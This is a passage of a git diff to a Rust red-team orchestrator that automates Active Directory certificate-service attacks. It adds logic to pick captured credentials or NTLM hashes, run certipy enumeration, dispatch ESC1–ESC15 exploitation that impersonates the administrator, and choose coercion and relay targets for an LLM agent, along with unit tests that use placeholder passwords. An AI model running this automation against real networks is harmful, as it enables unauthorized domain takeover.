not fall back to cross-domain" + ); + } + + #[test] + fn collect_all_credentials_quarantined_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("user2", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("user1", "contoso.local"); + state.quarantine_credential("user2", "fabrikam.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_case_insensitive_domain_matching_for_creds() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "Contoso.Local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + // Should match via case-insensitive comparison + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "Contoso.Local"); + } + + #[test] + fn collect_known_users_includes_empty_password_users() { + // known_users collects ALL creds for the domain, even ones with empty passwords + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("nopw_user", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + // Both users should appear in known_users (useful for ACE checking) + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"nopw_user".to_string())); + } +} diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs index f46d6a06..da76ef19 100644 --- a/ares-cli/src/orchestrator/automation/adcs.rs +++ b/ares-cli/src/orchestrator/automation/adcs.rs @@ -17,6 +17,230 @@ fn extract_domain_from_fqdn(fqdn: &str) -> Option { .map(|(_, d)| d.to_string()) } +/// Work item for ADCS enumeration. +struct AdcsWork { + host_ip: String, + /// Auth-and-identity dedup key + /// (e.g. `"192.168.58.10:cred:jdoe@contoso.local"` or `"…:hash:admin@…"`). + /// Including the credential identity prevents one wrong-domain attempt + /// from permanently locking a CA host against later, possibly-correct creds. + dedup_key: String, + dc_ip: Option, + domain: String, + credential: ares_core::models::Credential, + /// NTLM hash for pass-the-hash authentication (when no cleartext cred available). + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +/// Dedup key for a cred-based certipy_find attempt. +/// Format: `{host}:cred:{username}@{domain}` (lowercased identity). +pub(crate) fn dedup_key_cred(host: &str, cred: &ares_core::models::Credential) -> String { + format!( + "{}:cred:{}@{}", + host, + cred.username.to_lowercase(), + cred.domain.to_lowercase() + ) +} + +/// Dedup key for a hash-based certipy_find attempt. +/// Format: `{host}:hash:{username}@{domain}` (lowercased identity). +pub(crate) fn dedup_key_hash(host: &str, hash: &ares_core::models::Hash) -> String { + format!( + "{}:hash:{}@{}", + host, + hash.username.to_lowercase(), + hash.domain.to_lowercase() + ) +} + +/// Collect ADCS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_adcs_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_adcs_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + state + .shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .filter_map(|s| { + let host_lower = s.host.to_lowercase(); + + let domain = state + .hosts + .iter() + .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) + .and_then(|h| extract_domain_from_fqdn(&h.hostname)) + .and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + .iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + }) + .or_else(|| state.domains.first().cloned())?; + + // Skip domains we already own — DA on a domain means we don't + // need to escalate via its CA. (We may still need ADCS against an + // un-owned domain via cross-trust, so this is per-domain not global.) + if state.dominated_domains.contains(&domain) { + return None; + } + + // Look up DC IP for this domain (certipy needs LDAP on a DC, not the CA host). + // Uses resolve_dc_ip() which falls back to scanning hosts list when + // domain_controllers doesn't have an entry. + let dc_ip = state.resolve_dc_ip(&domain); + + // certipy_find authenticates via LDAP bind to the target DC. + // NTLM/Kerberos bind succeeds within the same forest (same domain or + // parent/child/sibling) but fails 52e across a forest trust because + // the source principal does not exist in the target's domain and + // impacket cannot follow Kerberos cross-realm referrals. + // + // Restrict cred selection to the same forest as the target. If no + // same-forest cred exists, skip dispatch — other automations + // (foreign_group_enum, mssql_linked_server, golden_cert) handle + // the cross-forest foothold path that yields a same-forest cred. + // + // The dedup key includes the candidate credential's identity, so a + // failed first attempt with one cred does not block a later, possibly + // correct cred against the same CA host. + let domain_lower = domain.to_lowercase(); + let target_forest = state.forest_root_of(&domain_lower); + let cred = { + let mut candidates: Vec<&ares_core::models::Credential> = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain_lower + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .collect(); + candidates.extend(state.credentials.iter().filter(|c| { + let cd = c.domain.to_lowercase(); + !c.password.is_empty() + && cd != domain_lower + && state.forest_root_of(&cd) == target_forest + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + })); + candidates + .into_iter() + .find(|c| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_cred(&s.host, c))) + .cloned() + }; + + // Look for NTLM hash (PTH) only if cred path is exhausted (no + // unprocessed cred candidate exists). Same identity-aware dedup. + let hash_pick = if cred.is_none() { + let pred_admin_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_same = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && (h.domain.to_lowercase() == domain_lower || h.domain.is_empty()) + && !state.is_delegation_account(&h.username) + }; + let same_forest = |h: &&ares_core::models::Hash| -> bool { + let hd = h.domain.to_lowercase(); + !hd.is_empty() && state.forest_root_of(&hd) == target_forest + }; + let pred_admin_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && h.username.to_lowercase() == "administrator" + }; + let pred_any_xdom = |h: &&ares_core::models::Hash| { + h.hash_type.eq_ignore_ascii_case("ntlm") + && same_forest(h) + && !state.is_delegation_account(&h.username) + }; + + let mut candidates: Vec<&ares_core::models::Hash> = Vec::new(); + candidates.extend(state.hashes.iter().filter(pred_admin_same)); + candidates.extend(state.hashes.iter().filter(pred_any_same).filter(|h| { + h.username.to_lowercase() != "administrator" + || (h.domain.to_lowercase() != domain_lower && !h.domain.is_empty()) + })); + candidates.extend( + state.hashes.iter().filter(pred_admin_xdom).filter(|h| { + h.domain.to_lowercase() != domain_lower && !h.domain.is_empty() + }), + ); + candidates.extend( + state + .hashes + .iter() + .filter(pred_any_xdom) + .filter(|h| h.username.to_lowercase() != "administrator"), + ); + candidates + .into_iter() + .find(|h| !state.is_processed(DEDUP_ADCS_SERVERS, &dedup_key_hash(&s.host, h))) + .cloned() + } else { + None + }; + let (ntlm_hash, ntlm_hash_username) = match &hash_pick { + Some(h) => (Some(h.hash_value.clone()), Some(h.username.clone())), + None => (None, None), + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + return None; + } + + let dedup_key = match (&cred, &hash_pick) { + (Some(c), _) => dedup_key_cred(&s.host, c), + (None, Some(h)) => dedup_key_hash(&s.host, h), + (None, None) => return None, + }; + + Some(AdcsWork { + host_ip: s.host.clone(), + dedup_key, + dc_ip, + domain: domain.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain, + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }) + }) + .collect() +} + /// Detects ADCS servers by looking for CertEnroll shares and dispatches certipy_find. /// Interval: 30s. Matches Python `_auto_adcs_enumeration`. pub async fn auto_adcs_enumeration( @@ -35,78 +259,70 @@ pub async fn auto_adcs_enumeration( break; } - // Find CertEnroll shares on unprocessed hosts + get a credential - let work: Vec<(String, String, ares_core::models::Credential)> = { + let work = { let state = dispatcher.state.read().await; - let cred = match state - .credentials - .iter() - .find(|c| { - !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - .or_else(|| state.credentials.first()) - { - Some(c) => c.clone(), - None => continue, - }; - state + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + let certenroll_shares: Vec<_> = state .shares .iter() .filter(|s| s.name.to_lowercase() == "certenroll") - .filter(|s| !state.is_processed(DEDUP_ADCS_SERVERS, &s.host)) - .filter_map(|s| { - // Resolve the domain for this ADCS host by matching the - // host's FQDN against known domains, or finding which DC - // subnet the host belongs to. Falls back to first domain. - let host_lower = s.host.to_lowercase(); - let domain = state - .hosts - .iter() - .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) - .and_then(|h| extract_domain_from_fqdn(&h.hostname)) - .and_then(|d| { - // Verify it's a known domain - if state.domains.iter().any(|known| known.to_lowercase() == d) { - Some(d) - } else { - // Try parent match (e.g. child.contoso.local → contoso.local) - state - .domains - .iter() - .find(|known| { - d.ends_with(&format!(".{}", known.to_lowercase())) - }) - .or_else(|| { - state.domains.iter().find(|known| { - known.to_lowercase().ends_with(&format!(".{d}")) - }) - }) - .cloned() - .or(Some(d)) - } - }) - .or_else(|| state.domains.first().cloned())?; - Some((s.host.clone(), domain, cred.clone())) - }) - .collect() + .collect(); + let ce_count = certenroll_shares.len(); + let ce_hosts: Vec<_> = certenroll_shares.iter().map(|s| s.host.as_str()).collect(); + let cred_domains: Vec<_> = state + .credentials + .iter() + .map(|c| c.domain.as_str()) + .collect(); + let hash_domains: Vec<_> = state.hashes.iter().map(|h| h.domain.as_str()).collect(); + let domains: Vec<_> = state.domains.iter().map(|d| d.as_str()).collect(); + let w = collect_adcs_work(&state); + info!( + creds, + hashes, + certenroll_shares = ce_count, + ?ce_hosts, + ?cred_domains, + ?hash_domains, + ?domains, + work_items = w.len(), + "auto_adcs_enumeration: tick" + ); + w }; - for (host_ip, domain, cred) in work { + for item in work { + // Use DC IP for certipy LDAP queries; fall back to CA host IP + let target_ip = item.dc_ip.as_deref().unwrap_or(&item.host_ip); + // Pass CA host IP separately so the parser sets the correct vuln target + // (the CA server, not the DC used for LDAP). + let ca_host_ip = if item.dc_ip.is_some() { + Some(item.host_ip.as_str()) + } else { + None + }; match dispatcher - .request_certipy_find(&host_ip, &domain, &cred) + .request_certipy_find( + target_ip, + &item.domain, + &item.credential, + item.ntlm_hash.as_deref(), + item.ntlm_hash_username.as_deref(), + ca_host_ip, + ) .await { Ok(Some(task_id)) => { - info!(task_id = %task_id, host = %host_ip, "ADCS enumeration dispatched"); + info!(task_id = %task_id, host = %item.host_ip, dc_ip = ?item.dc_ip, "ADCS enumeration dispatched"); dispatcher .state .write() .await - .mark_processed(DEDUP_ADCS_SERVERS, host_ip.clone()); + .mark_processed(DEDUP_ADCS_SERVERS, item.dedup_key.clone()); let _ = dispatcher .state - .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &host_ip) + .persist_dedup(&dispatcher.queue, DEDUP_ADCS_SERVERS, &item.dedup_key) .await; } Ok(None) => {} @@ -119,6 +335,259 @@ pub async fn auto_adcs_enumeration( #[cfg(test)] mod tests { use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + // --- collect_adcs_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_certenroll_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.50"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + let cred = make_credential("admin", "P@ssw0rd!", "contoso.local"); // pragma: allowlist secret + state.credentials.push(cred.clone()); + // Mark the identity-aware dedup key for the only candidate cred. + state.mark_processed(DEDUP_ADCS_SERVERS, dedup_key_cred("192.168.58.50", &cred)); + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_certenroll_share_ignored() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "SYSVOL")); + state + .hosts + .push(make_host("192.168.58.50", "dc01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.fabrikam.local", false)); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabadmin"); + } + + #[test] + fn collect_falls_back_to_first_domain_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + // No matching host in state.hosts + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_certenroll_case_insensitive() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "certenroll")); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_multiple_adcs_hosts() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state.shares.push(make_share("192.168.58.51", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state + .hosts + .push(make_host("192.168.58.51", "ca02.fabrikam.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fabadmin", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_skips_cross_forest_cred_for_ca_host() { + // contoso.local CA, only fabrikam.local cred (different forest). + // certipy_find LDAP bind across forest trust fails 52e — skip dispatch. + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("foreigner", "P@ss!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "should not dispatch ADCS enum with cross-forest cred" + ); + } + + #[test] + fn collect_uses_child_domain_cred_for_parent_ca() { + // child cred → parent CA: same forest, LDAP bind succeeds. + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("childuser", "P@ss!", "dev.contoso.local")); // pragma: allowlist secret + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "childuser"); + } + + #[test] + fn collect_quarantined_same_domain_does_not_fall_back_cross_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert!( + work.is_empty(), + "cross-forest LDAP bind fails 52e — must not dispatch with fabrikam cred" + ); + } + + #[test] + fn collect_quarantined_same_domain_falls_back_to_sibling_in_same_forest() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state.domains.push("dev.contoso.local".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "dev.contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_adcs_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } #[test] fn extract_domain_from_fqdn_typical() { @@ -159,4 +628,70 @@ mod tests { // "host." splits into ("host", "") -> Some("") assert_eq!(extract_domain_from_fqdn("host."), Some("".to_string())); } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ADCS_SERVERS, "adcs_servers"); + } + + #[test] + fn certenroll_share_name_match() { + let share_name = "CertEnroll"; + assert_eq!(share_name.to_lowercase(), "certenroll"); + } + + #[test] + fn certenroll_case_insensitive() { + let names = vec!["CertEnroll", "certenroll", "CERTENROLL"]; + for name in names { + assert_eq!(name.to_lowercase(), "certenroll"); + } + } + + #[test] + fn domain_resolution_from_fqdn() { + // Verifies domain extraction works for typical ADCS hosts + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + assert_eq!( + extract_domain_from_fqdn("ca01.fabrikam.local"), + Some("fabrikam.local".to_string()) + ); + } + + #[test] + fn credential_selection_prefers_same_domain() { + let creds = [ + ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ares_core::models::Credential { + id: "c2".into(), + username: "admin2".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }, + ]; + let target_domain = "fabrikam.local"; + let selected = creds.iter().find(|c| { + !c.password.is_empty() && c.domain.to_lowercase() == target_domain.to_lowercase() + }); + assert!(selected.is_some()); + assert_eq!(selected.unwrap().domain, "fabrikam.local"); + } } diff --git a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs index 124c9c2f..e65cbb07 100644 --- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs +++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs @@ -23,22 +23,48 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit"; /// ADCS vulnerability types we know how to exploit. -const EXPLOITABLE_ESC_TYPES: &[&str] = &[ +/// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool) +/// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain) +/// ESC7: ManageCA abuse (certipy_esc7_full_chain: add-officer → SubCA → issue → retrieve → auth) +/// ESC8: NTLM relay to HTTP web enrollment (coercion role) +/// ESC9/13: certipy req with specific flags +/// ESC10: Weak certificate mapping (StrongCertificateBindingEnforcement=0), certipy req -sid +/// ESC11: RPC relay to ICPR enrollment (certipy relay -target rpc://, coercion role) +/// ESC15: Application policy OID abuse (certipy req -application-policies) +pub(crate) const EXPLOITABLE_ESC_TYPES: &[&str] = &[ "esc1", + "esc2", + "esc3", "esc4", + "esc6", + "esc7", "esc8", + "esc9", + "esc10", + "esc11", + "esc13", + "esc15", "adcs_esc1", + "adcs_esc2", + "adcs_esc3", "adcs_esc4", + "adcs_esc6", + "adcs_esc7", "adcs_esc8", + "adcs_esc9", + "adcs_esc10", + "adcs_esc11", + "adcs_esc13", + "adcs_esc15", ]; /// Monitors for discovered ADCS vulnerabilities and dispatches exploitation tasks. -/// Interval: 30s. +/// Interval: 5s. pub async fn auto_adcs_exploitation( dispatcher: Arc, mut shutdown: watch::Receiver, ) { - let mut interval = tokio::time::interval(Duration::from_secs(30)); + let mut interval = tokio::time::interval(Duration::from_secs(5)); interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); loop { @@ -104,44 +130,63 @@ pub async fn auto_adcs_exploitation( .unwrap_or("") .to_string(); - let ca_host = extract_ca_host(&vuln.details, &vuln.target); + let ca_host = extract_ca_host(&vuln.details, &vuln.target).or_else(|| { + // When the parser couldn't determine the CA host (empty target), + // resolve it from the CertEnroll share for this domain. + resolve_ca_host_from_shares(&state.shares, &state.hosts, &domain) + }); // For ESC4, we need the account with GenericAll on the template let account_name = extract_account_name(&vuln.details); // Find a credential for exploitation. - // For ESC4, prefer the account that has GenericAll on the template. - // For ESC1/ESC8, any authenticated user in the domain works. - let credential = account_name + // For ESC4, prefer the account that has GenericAll on the + // template (it may live in a different domain than the CA + // — cross-forest ACL edge — so use the source-cred helper). + // For ESC1/ESC8/etc, any authenticated user in the CA's + // domain works; cross-forest ESC8 also accepts a credential + // from a trusting domain because the relay path doesn't + // need same-domain auth (the cert is issued to whatever + // principal lands on the relay). + let account_cred = account_name .as_ref() - .and_then(|acct| { - state.credentials.iter().find(|c| { - c.username.to_lowercase() == acct.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) + .and_then(|acct| state.find_source_credential(acct, &domain)); + + let same_domain_cred = if !domain.is_empty() { + state + .credentials + .iter() + .find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) }) - }) - .or_else(|| { - // Fall back to any credential for this domain - if !domain.is_empty() { - state.credentials.iter().find(|c| { - c.domain.to_lowercase() == domain.to_lowercase() - && !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } else { - state.credentials.iter().find(|c| { - !c.password.is_empty() - && !state.is_delegation_account(&c.username) - && !state.is_credential_quarantined(&c.username, &c.domain) - }) - } - }) - .cloned(); + .cloned() + } else { + state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned() + }; + + let trust_cred = if same_domain_cred.is_none() && !domain.is_empty() { + state.find_trust_credential(&domain) + } else { + None + }; + + let credential = account_cred.or(same_domain_cred).or(trust_cred); if credential.is_none() { - debug!( + info!( vuln_id = %vuln.vuln_id, esc_type = %esc_type, "ADCS exploit skipped: no credential available" @@ -154,6 +199,22 @@ pub async fn auto_adcs_exploitation( .get(&domain.to_lowercase()) .cloned(); + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + // For coercion-based ESC paths (esc8/esc11), build a + // tier-ordered candidate list of coerce targets so the LLM + // agent can iterate when the first one's callback drifts. + let coerce_candidates = if matches!(esc_type.as_str(), "esc8" | "esc11") { + pick_coerce_targets( + ca_host.as_deref(), + dc_ip.as_deref(), + &state.domain_controllers, + &state.hosts, + ) + } else { + Vec::new() + }; + Some(AdcsExploitWork { vuln_id: vuln.vuln_id.clone(), dedup_key, @@ -163,13 +224,49 @@ pub async fn auto_adcs_exploitation( ca_host, domain, dc_ip, + domain_sid, credential, + coerce_candidates, }) }) .collect() }; for item in work { + let role = role_for_esc_type(&item.esc_type); + + // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and + // a coerce target that is not the CA itself — Windows NTLM + // same-machine loopback protection blocks relay back to the + // coerced host. Without these, the dispatched task cannot succeed. + let (coerce_target, coerce_targets, listener_ip) = if role == "coercion" { + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + "ADCS coercion exploit skipped: no listener_ip configured" + ); + continue; + } + }; + if item.coerce_candidates.is_empty() { + debug!( + vuln_id = %item.vuln_id, + esc_type = %item.esc_type, + ca_host = ?item.ca_host, + "ADCS coercion exploit skipped: no coerce target distinct from ca_host" + ); + continue; + } + let primary = item.coerce_candidates[0].clone(); + let all = item.coerce_candidates.clone(); + (Some(primary), Some(all), Some(listener)) + } else { + (None, None, None) + }; + let mut payload = json!({ "technique": format!("adcs_{}", item.esc_type), "vuln_type": format!("adcs_{}", item.esc_type), @@ -177,6 +274,7 @@ pub async fn auto_adcs_exploitation( "esc_type": item.esc_type, "domain": item.domain, "impersonate": "administrator", + "instructions": esc_instructions(&item.esc_type), }); if let Some(ref ca) = item.ca_name { @@ -192,6 +290,23 @@ pub async fn auto_adcs_exploitation( if let Some(ref dc) = item.dc_ip { payload["dc_ip"] = json!(dc); } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + // Administrator RID is always 500 + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + if let Some(ref ip) = listener_ip { + payload["listener_ip"] = json!(ip); + } + if let Some(ref t) = coerce_target { + payload["coerce_target"] = json!(t); + } + if let Some(ref ts) = coerce_targets { + if !ts.is_empty() { + payload["coerce_targets"] = json!(ts); + } + } if let Some(ref cred) = item.credential { payload["username"] = json!(cred.username); @@ -203,10 +318,6 @@ pub async fn auto_adcs_exploitation( }); } - // ESC8 uses coercion+relay, dispatch to coercion role. - // ESC1/ESC4 use certipy directly, dispatch to privesc role. - let role = role_for_esc_type(&item.esc_type); - let priority = dispatcher.effective_priority(&format!("adcs_{}", item.esc_type)); match dispatcher .throttled_submit("exploit", role, payload, priority) @@ -300,13 +411,190 @@ fn extract_account_name( .map(|s| s.to_string()) } +/// Resolve CA host IP from CertEnroll shares when the vuln has no target. +/// Looks for a CertEnroll share whose host belongs to the given domain. +/// Falls back to any CertEnroll share if no domain-matched share is found. +fn resolve_ca_host_from_shares( + shares: &[ares_core::models::Share], + hosts: &[ares_core::models::Host], + domain: &str, +) -> Option { + let certenroll_shares: Vec<_> = shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .collect(); + + if certenroll_shares.is_empty() { + return None; + } + + // Try domain-matched share first + if !domain.is_empty() { + let domain_lower = domain.to_lowercase(); + if let Some(s) = certenroll_shares.iter().find(|s| { + hosts.iter().any(|h| { + (h.ip == s.host || h.hostname.to_lowercase() == s.host.to_lowercase()) + && h.hostname.to_lowercase().ends_with(&domain_lower) + }) + }) { + return Some(s.host.clone()); + } + } + + // Fall back to any CertEnroll share (likely the CA for this environment) + certenroll_shares.first().map(|s| s.host.clone()) +} + +/// Build a tier-ordered list of viable coerce targets for ESC8/ESC11, +/// excluding the CA host (Windows NTLM same-machine loopback blocks relay +/// back to the coerced host). Tiers: (1) the vuln-domain DC, (2) 